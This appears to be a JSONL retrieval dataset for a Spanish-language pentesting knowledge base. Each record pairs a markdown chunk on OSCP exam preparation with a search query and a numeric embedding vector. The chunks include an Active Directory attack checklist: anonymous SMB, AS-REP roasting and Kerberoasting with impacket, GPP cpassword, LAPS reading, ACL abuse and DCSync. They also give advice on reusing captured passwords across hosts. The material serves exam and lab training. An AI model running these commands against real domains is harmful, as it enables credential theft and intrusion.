0.09568, -0.08066, -0.12317, 0.07656, 0.04948, -0.0811, 0.04686, -0.06137, 0.03452, -0.05033, 0.0346, 0.01705, -0.02025, 0.04341, -0.07504, -0.00724, 0.06774, -0.05988, -0.06834, -0.01899, 0.00337, -0.13716, 0.01877, -0.01613, -0.0475, 0.08874, -0.10849, 0.02253, -0.01344, -0.03811, 0.06789, -0.01755, 0.03565, 0.00798, -0.01672, -0.05658, -0.06774, 0.01161, 0.08513, -0.08979, 0.09548, -0.06506, 0.05, 0.07222, -0.05409, 0.04818, -0.09069, 0.0284, 0.00696, -0.09522, -0.04973, -0.04564, 0.01312, -0.04817, -0.10396, 0.04933, 0.02324, -0.0339, -0.07964, 0.02938, 0.0311, 0.02015, -0.00835, 0.02014, 0.03868, -0.01344, -0.06346, -0.02252, -0.01313, -0.03381, -0.0158, 0.03701, 0.02492, -0.0238, -0.09627, -0.09203, -0.00708, -0.03515, -0.02141, 0.01468, -0.06102, 0.07164, 0.03489, 0.0589, -0.06714, -0.05468, 0.01594, 0.06475, -0.04919, -0.06021, 0.05271, -0.05257, -0.00728, -0.01797, -0.12902, -0.07658, 0.12757, -0.03515, -0.04302, 0.02694, 0.0341, -0.03402, -0.0679, 0.0165, 0.0358, 0.05867, -0.01862, -0.0205, 0.0725, 0.0142, -0.06249, 0.01762, -0.07755, -0.04069, -0.08017, -0.00122, -0.02285, -0.05281, -0.0414, -0.02305, -0.04909, -0.00624, -0.02409, 0.05396, -0.02986, 0.00877, -0.03273, 0.02971, 0.00687, -0.02737, 0.04857, -0.00295, -0.03233, -0.00632, -0.02844, -0.03351, -0.098, -0.04184, 0.06122, -0.04339, -0.03482, 0.04382, 0.03788, -0.05206, 0.04122, -0.04498, 0.01856, 0.06845, -0.04791, 0.05278, -0.08885, -0.07653, -0.03729, -0.02529, -0.02424, -0.01303, 0.02886, -0.01995, 0.00289, 0.04388, 0.04157, 0.00956, -0.02777, 0.00097, 0.01176, 0.0106, 0.02417, -0.01282, 0.07586, -0.04685, 0.00497, 0.08371, 0.01264, -0.02254, -0.04475, 0.02023, 0.00237, -0.02059, 0.05135, -0.00462, -0.02918, -0.05714, -0.01698, -0.05314, -0.02567, -0.0136, -0.02944, 0.02105, 0.02242, 0.02752, 0.01438, 0.01933, -0.02024]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Active Directory β€” los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB β†’ smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting β†’ impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting β†’ impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword β†’ buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS β†’ nxc ldap IP -u u -p p --module laps\n6. ACL abuses β†’ BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync β†’ con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "indexar": "quΓ© programa permite copiar todas las claves del dominio si tengo permisos de replicaciΓ³n", "v": [0.08424, 0.00424, -0.10978, -0.1571, 0.11803, -0.17917, 0.06127, -0.01358, -0.16474, -0.13046, 0.07855, -0.00449, 0.04077, -0.16934, 0.11362, -0.01859, 0.16901, -0.04523, 0.05939, -0.00623, 0.05651, -0.12156, -0.11046, -0.05487, -0.01256, -0.09659, 0.12702, -0.00402, -0.07688, 0.02568, 0.032, -0.01804, 0.10307, -0.05186, -0.01854, 0.02931, 0.0317, 0.04048, 0.04342, -0.03409, 0.08086, -0.01576, -0.22162, 0.08855, -0.05718, -0.04867, -0.02131, -0.01791, -0.02438, -0.10329, -0.03616, -0.07814, -0.07194, -0.17427, -0.01245, -0.07929, 0.18109, -0.06285, -0.00839, -0.00648, -0.0514, -0.014, 0.03635, 0.05245, 0.01457, -0.08414, 0.06691, 0.02621, -0.04079, 0.10505, -0.07335, 0.03692, 0.10715, 0.02401, 0.05773, -0.09758, -0.05043, -0.1582, 0.00804, 0.06048, 0.01438, -0.02989, -0.02982, -0.0178, -0.02697, -0.04046, -0.02279, -0.01616, 0.00241, 0.01813, 0.02259, 0.06095, 0.0542, 0.011, -0.0158, -0.11562, 0.03469, 0.03281, -0.047, 0.03656, 0.07762, 0.05485, -0.09166, 0.13951, -0.00644, 0.14128, 0.03811, -0.11489, -0.08706, 0.03904, -0.01022, -0.03079, -0.08894, -0.04807, -0.07728, 0.0563, -0.00692, -0.06692, -0.0137, -0.00443, -0.0606, 0.03175, 0.01571, 0.01624, 0.03101, 0.00094, -0.02909, 0.06091, -0.07569, -0.12569, -0.04294, 0.04827, 0.03224, 0.00388, 0.00484, -0.01261, -0.01717, 0.01835, -0.09616, -0.07572, -0.05006, 0.04972, -0.01397, 0.02764, 0.00219, -0.03961, 0.04515, -0.08803, -0.05569, -0.01066, -0.06029, 0.04634, 4e-05, 0.05011, -0.03299, 0.05731, -0.10268, -0.04711, -0.00578, 0.111, -0.06238, 0.02577, -0.10514, 0.02246, 0.11192, -0.02841, 0.00788, -0.01266, 0.03689, 0.08898, -0.05829, 0.05891, -0.01496, -0.09156, 0.02938, -0.02557, 0.02103, -0.06494, -0.04076, -0.01463, -0.09624, 0.05241, -0.00118, 0.05665, 0.01716, 0.004, 0.00245, 0.08911, -0.01646, 0.03733, 0.06785, 0.04365, -0.00571, -0.00722, 0.04803, -0.0264, -0.00701, -0.01235, 0.02725, -0.00349, -0.05471, -0.03674, -0.03164, -0.0525, 0.05596, 0.00688, -0.0447, 0.01498, 0.01507, 0.03092, -0.01596, -0.04809, 0.04589, -0.01523, 0.00438, -0.0054, -0.05471, 0.06374, 0.04463, -0.04197, 0.03255, 0.04888, 0.0429, 0.05726, -0.0043, -0.0539, 0.05955, 0.03033, 0.06599, 0.08156, 0.01072, 0.02604, -0.03036, 0.00198, 0.04905, -0.02753, -0.00559, 0.01404, -0.00725, -0.01386, -0.05341, 0.03342, 0.02283, -0.03901, -0.04283, 0.00687, -0.01955, 0.03361, -0.00545, -0.03307, 0.03126, 0.04827, 0.01436, -0.05075, 0.02533, 0.01891]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de \"examen real\" (anti-pΓ‘nico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h β‰  24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de mΓ‘quina.\n Cierra y vuelve mΓ‘s tarde con cabeza fresca.\n\n─ DocumentaciΓ³n EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ ReutilizaciΓ³n de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 mΓ‘quinas encadenadas. Si te atascas en mΓ‘quina 1,\n no avanzas en 2 y 3. Empieza por ahΓ­ con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 mΓ‘quinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "indexar": "quΓ© programa me sirve para capturar y documentar comandos en tiempo real mientras los ejecuto?", "v": [0.03003, 0.13119, -0.09755, -0.12495, 0.05535, -0.10529, 0.08814, 0.0332, -0.03581, -0.07104, -0.06782, -0.04639, 0.0283, -0.13324, -0.00301, 0.04674, 0.19544, 0.04653, 0.02156, -0.03818, 0.01948, -0.07028, 0.05033, -0.06527, 0.04781, -0.04802, 0.05233, 0.04334, -0.08654, -0.08434, 0.05109, 0.13136, 0.03477, -0.11053, -0.03965, -0.03167, -0.01127, -0.01481, -0.12561, 0.10064, 0.01924, 0.05524, -0.12643, 0.10736, -0.004, -0.05254, 0.06716, -0.02884, -0.02171, -0.0942, 0.03984, 0.06623, -0.05592, 0.04888, -0.07705, -0.09824, 0.05526, -0.13995, 0.02689, -0.01819, -0.0493, -0.08883, 0.00498, 0.01136, 0.09352, -0.04152, 0.06847, -0.04548, -0.01424, 0.02126, -0.12279, 0.07841, 0.01636, 0.04874, -0.03509, -0.04892, -0.07191, -0.07318, 0.0723, -0.0515, -0.02448, -0.07456, -0.00813, 0.07435, -0.08651, 0.01115, 0.01239, -0.05607, -0.04759, -0.1487, 0.06697, 0.13852, 0.02494, 0.07154, 0.14966, 0.00125, 0.08185, 0.00833, 0.02738, 0.07052, 0.03415, -0.06493, -0.13109, 0.07989, 0.03897, 0.15692, 0.04409, -0.04552, -0.10761, 0.05971, -0.03337, -0.01819, -0.08364, -0.00525, -0.0184, -0.01122, 0.01336, -0.13224, 0.01945, -0.09025, -0.09212, 0.0878, -0.06088, -0.04661, 0.06967, -0.02174, -0.07231, 0.00991, 0.07368, 0.03757, 0.00082, 0.03648, 0.05613, -0.03807, -0.02055, -0.02606, 0.13156, -0.01584, -0.0877, -0.2056, 0.06804, -0.01181, -0.0411, -0.00832, 0.02195, 0.01499, -0.02696, -0.01225, -0.04718, 0.03313, 0.02889, -0.06074, -0.02064, 0.03916, 0.00205, -0.01655, 0.03477, -0.01598, -0.13528, 0.04757, 0.03705, -0.02917, -0.07599, -0.10754, 0.07161, -0.09384, -0.02434, 0.01048, 0.0301, 0.03621, 0.06262, 0.01509, 0.03642, -0.09088, 0.00524, -0.06217, 0.02823, -0.05761, 0.0339, -0.0538, -0.04424, 0.11825, 0.11972, 0.0363, 0.00545, -0.05399, -0.03553, 0.02827, -0.00648, 0.04028, 0.04002, 0.01212, 0.02022, -0.0012, -0.01568, -0.05906, 0.0099, 0.01576, 0.04793, -0.01449, -0.04618, -0.04206, 0.01084, 0.00791, 0.04192, 0.0676, -0.07912, 0.0805, 0.02091, 0.0449, -0.0505, 0.03623, 0.05356, -0.01673, -0.06028, -0.06287, 0.06859, 0.05561, -0.04001, 0.01757, 0.03289, 0.00375, 0.03556, 0.05641, -0.02731, -0.03371, 0.04381, 0.01363, -0.03726, -0.06165, -0.04399, -0.00698, -0.04379, -0.01298, 0.02795, 0.01421, -0.00114, -0.01681, -0.02485, -0.06612, 0.00685, 0.09243, -0.05636, -0.02834, -0.01719, 0.016, -0.04096, 0.02331, 0.0405, -0.06049, -0.02518, 0.04269, 0.04746, -0.02663, 0.02956, -0.00224]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de \"examen real\" (anti-pΓ‘nico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h β‰  24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de mΓ‘quina.\n Cierra y vuelve mΓ‘s tarde con cabeza fresca.\n\n─ DocumentaciΓ³n EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ ReutilizaciΓ³n de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 mΓ‘quinas encadenadas. Si te atascas en mΓ‘quina 1,\n no avanzas en 2 y 3. Empieza por ahΓ­ con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 mΓ‘quinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "indexar": "cuΓ‘l es la mejor tΓ©cnica para no bloquearme si me atasco en un paso del examen real?", "v": [0.0773, 0.04134, -0.10623, 0.01362, 0.01565, -0.10529, 0.00792, -0.01232, -0.07494, -0.07765, -0.10838, -0.04933, -0.03327, 0.00057, 0.11598, 0.06732, -0.0716, -0.03487, 0.08737, 0.00684, 0.06533, -0.2158, -0.12583, 0.07332, 0.03247, -0.0679, -0.12577, 0.03108, -0.14706, -0.11603, 0.00416, -0.00413, 0.07294, -0.1304, 0.05888, -0.0239, 0.19557, -0.01203, 0.02073, 0.18561, -0.01411, -0.08803, 0.0169, 0.05994, 0.004, -0.06528, 0.15239, 0.11292, -0.03078, -0.06154, 0.03265, 0.05992, 0.0235, -0.01285, -0.06247, -0.02257, 0.12596, 0.05314, 0.06813, -0.0777, -0.02528, -0.12307, 0.09524, 0.01093, 0.03498, -0.0156, 0.04403, -0.03761, 0.04251, 0.02688, -0.00936, -0.05475, 0.05028, -0.01739, -0.12958, 0.00354, -0.08472, 0.01234, 0.0546, -0.03849, 0.09256, 0.00869, -0.00871, 0.06771, -0.10685, 0.00471, -0.07743, -0.10328, -0.00257, -0.11896, 0.02982, 0.07478, 0.04925, -0.05365, 0.05449, 0.039, 0.02285, 0.01127, -0.06321, -0.02205, 0.11417, -0.03127, -0.10804, 0.01816, -0.00999, 0.1329, -0.02636, -0.11723, -0.11027, -0.07863, -0.08668, 0.0558, -0.12984, 0.00668, -0.03608, -0.04743, -0.02857, -0.09428, -0.03286, -0.03935, -0.05511, 0.03537, -0.03255, -0.05154, 0.09702, 0.06694, 0.05455, 0.02038, -0.00919, 0.02551, -0.08926, 0.0108, -0.10503, -0.03736, -0.07911, -0.03352, 0.01586, -0.05442, 0.00292, -0.05023, 0.01701, 0.07928, -0.04537, -0.01011, -0.00876, -0.0146, -0.07067, -0.055, -0.10231, -0.09149, -0.02379, -0.07396, 0.06371, 0.08159, -0.06398, -0.07481, -0.03179, -0.06681, 0.03107, 0.12024, -0.00154, 0.01441, -0.08567, -0.01707, -0.08063, 0.0203, -0.06549, -0.0153, -0.02866, -0.07255, -0.01478, -0.01853, -0.04709, -0.05369, -0.02168, 0.00498, 0.07553, -0.0197, 0.00346, -0.07776, -0.07601, -0.02305, 0.01758, -0.00563, 0.08063, 0.06725, 0.01815, 0.00398, 0.07927, 0.03228, 0.0178, -0.03706, -0.03944, 0.01822, -0.03162, -0.00942, 0.03519, -0.01916, 0.00113, -0.01919, -0.01661, -0.05611, -0.01904, -0.08665, -0.01813, 0.03074, -0.03636, 0.01559, -0.01868, 0.02542, 0.00448, -0.04066, 0.04823, -0.06058, 0.00781, -0.02513, -0.05574, 0.02218, -0.02019, -0.0346, -0.01198, 0.04066, -0.01368, 0.03928, -0.06231, -0.01829, -0.01785, 0.00997, -0.0112, 0.00219, -0.00278, -0.03172, 0.0747, 0.0478, 0.03057, 0.00915, -0.00022, -0.02712, 0.03298, -0.11875, 0.0382, 0.05543, 0.00467, -0.08005, -0.07387, 0.04829, -0.06842, -0.01279, -0.05335, -0.06418, 0.00628, -0.02301, 0.07213, 0.03438, 0.04783, -0.01454]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de \"examen real\" (anti-pΓ‘nico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h β‰  24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de mΓ‘quina.\n Cierra y vuelve mΓ‘s tarde con cabeza fresca.\n\n─ DocumentaciΓ³n EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ ReutilizaciΓ³n de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 mΓ‘quinas encadenadas. Si te atascas en mΓ‘quina 1,\n no avanzas en 2 y 3. Empieza por ahΓ­ con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 mΓ‘quinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "indexar": "con quΓ© herramienta puedo probar varias contraseΓ±as contra diferentes hosts de forma automΓ‘tica?", "v": [0.11886, 0.14959, -0.15676, -0.13881, -0.01964, -0.00502, 0.0216, -0.05041, -0.12835, -0.11565, -0.06293, -0.00848, 0.03385, -0.07218, 0.04998, 0.07024, 0.13216, -0.13352, 0.01118, 0.09919, 0.00854, -0.13921, -0.08804, -0.04924, -0.01648, -0.08746, 0.10419, 0.02289, -0.19595, -0.01457, -0.01034, 0.00422, 0.07638, -0.01003, -0.08713, 0.03689, -0.03712, 0.08739, 0.06874, 0.05506, 0.09818, 0.02656, -0.10117, 0.04131, -0.01521, 0.04072, -0.09437, 0.01581, -0.02119, -0.00821, -0.04103, -0.14676, -0.09551, -0.07002, -0.03607, -0.19542, 0.16595, -0.06318, 0.04125, -0.07374, -0.0691, 0.10893, 0.00545, 0.07693, -0.04391, -0.05349, 0.00906, -0.07193, -0.09631, 0.04814, -0.02258, -0.01104, -0.03249, -0.00863, 0.0456, 0.06977, 0.01384, 0.06896, 0.0084, 0.04953, -0.05992, -0.005, -0.0222, 0.01659, -0.08267, -0.09819, 0.01597, -0.08096, 0.04827, -0.10393, 0.07869, 0.02981, 0.08435, 0.05351, 0.03347, -0.10518, 0.10101, -0.02603, -0.02894, -0.03322, 0.06977, -0.03693, -0.06466, 0.18644, -0.03118, 0.02031, -0.03291, 0.0125, -0.00499, -0.06253, 0.0328, 0.01215, -0.08709, -0.02543, -0.00128, -0.00895, -0.03298, -0.05524, 0.02525, -0.01205, -0.02065, -0.01871, -0.01695, 0.01607, 0.11808, 0.03554, -0.02614, 0.07031, -0.01558, -0.04822, 0.02592, -0.01949, -0.08227, -0.02258, -0.01991, 0.05312, 0.00371, -0.1166, -0.06936, -0.04607, -0.00683, 0.07447, 0.03082, -0.08324, 0.04144, -0.01824, 0.00258, -0.06551, -0.06667, 0.06502, -0.0176, -0.03851, 0.07864, 0.06389, -0.08548, 0.02756, -0.03914, -0.0841, -0.0619, 0.15554, -0.02971, -0.04865, -0.02602, 0.04687, -0.01068, -0.02888, -0.03365, -0.03437, 0.06193, 0.03585, 0.02009, 0.0829, 0.03101, -0.02488, -0.03776, -0.03774, -0.05283, -0.06261, 0.02863, -0.16093, -0.03744, 0.02287, -0.07513, -0.04516, 0.02748, -0.03819, 0.05748, 0.01315, 0.05049, 0.00317, 0.00871, 0.07257, -0.0382, -0.0272, 0.01981, -0.0297, -0.01422, -0.0699, 0.0113, -0.03508, -0.05399, -0.01829, -0.0378, -0.06441, 0.0287, 0.06478, -0.06651, 0.00769, 0.0012, 0.00463, 0.08484, -0.01295, 0.08282, -0.05567, -0.04475, -0.03199, -0.04183, -0.00158, -0.03431, 0.0069, 0.03413, 0.04216, 0.0794, 0.0087, -0.0184, 0.01576, 0.04692, 0.07191, 0.04678, -0.00339, -0.00339, 0.04413, -0.02203, -0.01212, 0.07819, -0.02104, 0.02123, -0.0598, -0.05764, -0.03156, -0.00425, 0.07719, 0.02823, -0.05156, -0.06458, -0.0751, -0.03165, 0.00887, -0.0021, -0.04063, -0.06012, 0.04884, 0.04556, -0.03596, 0.00085, -0.02143]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "─ Reporte cuenta ─────────────────────────────────────────\n Sin reporte, no apruebas, aunque saques 100 puntos\n tΓ©cnicos. 24h despuΓ©s del examen. Markdown template:\n https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n\n─ Metasploit limitado ────────────────────────────────────\n Puedes usarlo solo en UNA mΓ‘quina.\n meterpreter post-explotation no cuenta como \"uso\"\n solo el initial foothold cuenta.\n```\n\n---", "indexar": "cuΓ‘l es la mejor forma de presentar los resultados de un examen OSCP?", "v": [-0.06281, 0.03858, 0.00876, -0.13406, 0.13676, -0.25942, 0.06901, -0.00787, -0.07374, -0.09054, -0.11007, -0.01262, -0.09248, -0.03972, 0.03468, 0.07129, 0.0718, 0.02295, -0.0004, 0.0062, -0.07074, -0.06669, -0.12442, 0.06489, 0.03986, 0.06199, -0.05492, -0.00212, 0.02401, -0.08092, 0.02216, 0.05282, -0.05193, -0.07526, -0.0202, 0.02312, -0.05033, -0.08583, -0.07511, 0.16985, -0.09325, 0.01999, 0.01913, 0.07948, 0.08659, -0.04408, -0.00767, 0.19479, -0.0636, -0.15951, -0.00328, -0.02067, 0.00937, 0.0029, -0.06855, -0.08352, -0.06782, -0.01558, 0.19265, -0.14265, 0.09233, 0.02662, -0.06674, -0.08365, 0.05517, -0.05815, -0.05275, 0.03017, -0.04311, -0.04215, -0.03368, 0.01922, -0.04787, -0.06191, -0.06304, 0.01608, -0.06251, -0.00141, 0.12083, -0.05805, 0.1076, -0.09804, -0.09376, 0.09615, -0.11112, -0.10007, 0.01457, -0.03055, -0.0469, -0.07113, 0.03546, 0.00192, 0.05076, 0.04612, -0.02901, -0.09263, 0.04945, 0.00217, -0.0597, -0.06219, -0.00947, 0.05595, -0.08326, 0.00085, -0.14788, 0.06945, 0.02599, -0.04296, -0.05171, 0.00877, -0.04158, -0.02228, -0.05651, 0.03733, -0.11401, -0.08888, 0.02597, -0.03672, -0.01814, -0.02498, -0.03405, 0.0357, -0.01511, 0.01808, 0.02379, 0.04926, 0.11037, 0.01857, 0.03526, 0.07031, 0.00576, 0.04551, -0.12965, -0.00212, -0.05142, -0.07001, -0.01328, -0.04132, 0.09028, -0.00883, 0.01904, 0.06907, 0.04431, -0.11179, 0.04463, -0.0252, -0.02878, 0.01994, -0.08889, -0.04741, -0.0586, -0.05167, 0.08235, 0.00921, -0.07327, 0.01033, -0.01306, -0.01891, 0.11949, 0.09161, -0.03006, -0.04136, -0.06117, 0.05185, 0.02277, 0.00689, -0.03841, -0.00479, 0.02908, -0.08721, 0.00919, 0.00783, -0.05975, -0.0416, 0.0676, -0.00795, 0.02355, -0.01037, -0.02248, -0.02421, -0.07914, 0.06517, -0.06177, -0.00685, 0.05626, -0.02403, 0.06854, 0.00109, 0.04408, 0.00949, 0.094, -0.00941, -0.04843, -0.03885, 0.0148, -0.05574, 0.02719, -0.07681, 0.02718, -0.01122, -0.10157, -0.09315, -0.05945, -0.06527, 0.01625, 0.04315, -0.02598, 0.06983, 0.0338, 0.0346, -0.02304, -0.04451, 0.06653, -0.05693, -0.01152, 0.05011, 0.04554, 0.03993, -0.03795, 0.00823, -0.00291, 0.00271, 0.02759, -0.00403, -0.04048, 0.03527, 0.00716, 0.01602, 0.0377, -0.00182, 0.01705, 0.0192, 0.0546, -0.043, 0.05834, 0.04092, 0.03883, -0.04044, -0.01404, -0.08205, 0.05147, 0.0532, 0.00257, -0.04449, -0.0701, -0.00388, -0.06767, 0.00044, 0.00389, -0.11341, -0.01, -0.01581, 0.07031, -0.00242, 0.00608, -0.00961]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "─ Reporte cuenta ─────────────────────────────────────────\n Sin reporte, no apruebas, aunque saques 100 puntos\n tΓ©cnicos. 24h despuΓ©s del examen. Markdown template:\n https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n\n─ Metasploit limitado ────────────────────────────────────\n Puedes usarlo solo en UNA mΓ‘quina.\n meterpreter post-explotation no cuenta como \"uso\"\n solo el initial foothold cuenta.\n```\n\n---", "indexar": "cΓ³mo puedo demostrar que logrΓ© la primera mΓ‘quina con Metasploit?", "v": [-0.12506, 0.076, -0.04028, -0.01455, -0.02998, 0.02013, -0.05522, -0.04224, -0.19524, -0.10086, -0.03719, 0.14488, 0.07531, -0.06799, 0.13166, 0.00793, 0.03615, -0.03804, -0.05072, -0.16114, -0.00329, -0.16548, -0.04888, -0.28424, 0.02027, 0.10561, 0.04014, 0.06013, -0.13508, -0.01043, -0.12228, 0.07933, -0.07675, -0.12813, 0.04214, -0.09055, -0.04082, 0.04421, 0.1515, 0.03797, -0.11345, -0.03349, -0.05106, 0.09285, 0.17102, -0.09846, 0.01982, -0.04961, -0.14044, -0.02968, -0.06418, -0.03461, -0.02129, 0.01581, -0.10248, -0.11964, 0.08905, 0.06451, 0.00191, -0.01134, 0.06943, 0.03911, 0.02941, 0.00236, -0.01995, -0.02619, 0.06657, 0.0255, 0.01164, -0.01733, -0.1177, 0.06075, -0.10343, -0.08784, 0.01131, 0.08414, -0.00517, -0.00892, 0.09734, 0.05583, -0.03574, -0.023, -0.08283, -0.03363, 0.00072, 0.02799, 0.00757, -0.05467, 0.12217, -0.07274, 0.01397, 0.08381, 0.01377, -0.06024, 0.05276, -0.02116, 0.01626, 0.02095, 0.01149, 0.02751, 0.04425, 0.0242, -0.05604, 0.10084, -0.00431, 0.04672, 0.0922, -0.06198, -0.05884, -0.11932, 0.06856, -0.07682, -0.10089, -0.04049, 0.00851, 0.0112, -0.03213, -0.02623, -0.07448, 0.04034, 0.00826, -0.03554, 0.05159, -0.03654, 0.03185, -0.00694, 0.00889, 0.05188, -0.04344, -0.04285, 0.00374, 0.08703, 0.00763, 0.02769, -0.02157, 0.03183, 0.06417, -0.03974, -0.05096, -0.11964, 0.01733, 0.12021, -0.0269, -0.10211, -0.01187, 0.01037, 0.01253, -0.04772, -0.07565, 0.00517, 0.02817, -0.04748, 0.08619, 0.06479, -0.08455, -0.02501, 0.01508, 0.0172, 0.09703, 0.00291, -0.04618, -0.04768, -0.05722, 0.0433, -0.00845, 0.02397, -0.01838, 0.01059, -0.02795, -0.0275, -0.00425, -0.02506, 0.06406, 0.02822, 0.04904, 0.01677, 0.04496, -0.01222, 0.01229, -0.02064, -0.06914, 0.0556, 0.00336, -0.07073, -0.01598, -0.03647, -0.04212, 0.00106, 0.04472, 5e-05, 0.0634, 0.0264, -0.0282, 0.03827, 0.02328, -0.00611, -0.02753, -0.0251, 0.02836, 0.0665, -0.04492, -0.0215, -0.06258, -0.01324, 0.01118, 0.06158, -0.05108, -0.04938, -0.05508, 0.01311, 0.06019, -0.0242, 0.0018, -0.06317, -0.08184, 0.03847, -0.05327, -0.00266, -0.12913, 0.02359, 0.04394, -0.02705, -0.0071, 0.0013, -0.05403, 4e-05, 0.07321, 0.00309, 0.05885, 0.04542, -0.03704, 0.05925, 0.00426, -0.00553, -0.00453, 0.0526, 0.02202, -0.04485, -0.06683, -0.02577, 0.0252, 0.10749, -0.00542, -0.07108, -0.03013, -0.02236, -0.04504, -0.01383, -0.02872, -0.03435, -0.01107, 0.00086, 0.07507, -0.0187, -0.006, 0.0144]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Recursos pΓΊblicos donde sΓ­ estΓ‘ todo esto\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (en Reddit) | Lista actualizada de mΓ‘quinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista todas las mΓ‘quinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos con explicaciΓ³n pedagΓ³gica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques estΓ‘ ahΓ­ |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "indexar": "que herramienta sirve para buscar mΓ‘quinas donde se usa kerberoasting?", "v": [0.0489, -0.11693, -0.14307, -0.1363, -0.05201, -0.19508, -0.16729, 0.0588, -0.01692, -0.15132, -0.17693, -0.04887, 0.0702, -0.07495, 0.10665, 0.0401, 0.03458, -0.02177, 0.07722, 0.03508, 0.04736, 0.07206, -0.02588, -0.02273, -0.12911, 0.05616, 0.02675, -0.1369, -0.30592, 0.13231, -0.00086, 0.10106, 0.07396, -0.07954, -0.07307, -0.11257, -0.04228, 0.04238, 0.00305, 0.07252, 0.01818, 0.0603, -0.08925, 0.01781, 0.05398, -0.00966, -0.03099, 0.01441, -0.06567, 0.11023, -0.01681, -0.12831, -0.03685, 0.03431, 0.02558, -0.13394, 0.18394, -0.04984, 0.00634, -0.05765, -0.15436, -0.0378, -0.11278, 0.00228, -0.05369, -0.01324, 0.05657, -0.09589, 0.00796, -0.03551, -0.07679, 0.03556, 0.09713, -0.01361, 0.01312, 0.05, 0.08108, 0.09422, 0.07105, -0.05618, -0.03694, -0.02165, -0.11294, 0.00901, 0.00914, -0.06476, 0.15275, 0.0128, 0.04408, -0.05497, -0.03414, 0.13295, -0.03354, 0.01097, 0.04793, 0.00849, 0.00086, 0.03003, 0.0541, 0.02844, 0.15699, -0.0777, -0.06461, 0.03841, -0.08892, 0.02006, 0.02289, -0.0208, -0.04237, -0.04214, 0.08415, -0.02596, 0.02396, -0.04034, -0.05685, 0.09807, -0.0333, 0.00546, -0.00258, -0.00705, -0.01004, 0.08708, -0.01966, -0.05278, 0.00569, -0.03161, -0.00756, 0.04143, 0.00423, -0.06178, 